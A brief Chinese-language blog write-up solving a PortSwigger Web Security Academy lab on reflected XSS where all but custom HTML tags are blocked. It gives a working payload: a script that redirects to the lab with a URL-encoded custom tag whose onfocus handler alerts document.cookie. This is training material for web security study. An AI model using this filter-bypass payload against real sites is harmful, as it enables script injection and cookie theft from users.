Lab: Reflected XSS into HTML context with all tags blocked except custom ones:将 XSS 反射到 HTML 上下文中,除自定义标签外的所有标签都被阻止
靶场内容
此实验室阻止除自定义标记之外的所有 HTML 标记。
要解决实验室问题,请执行跨站点脚本攻击,注入自定义标记并自动发出警报document.cookie。
漏洞解析
- 注入以下脚本到服务器
<script>
location = 'https://your-lab-id.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
</script>
本文来自博客园,作者:{Zeker62},转载请注明原文链接:https://www.cnblogs.com/Zeker62/p/15183539.html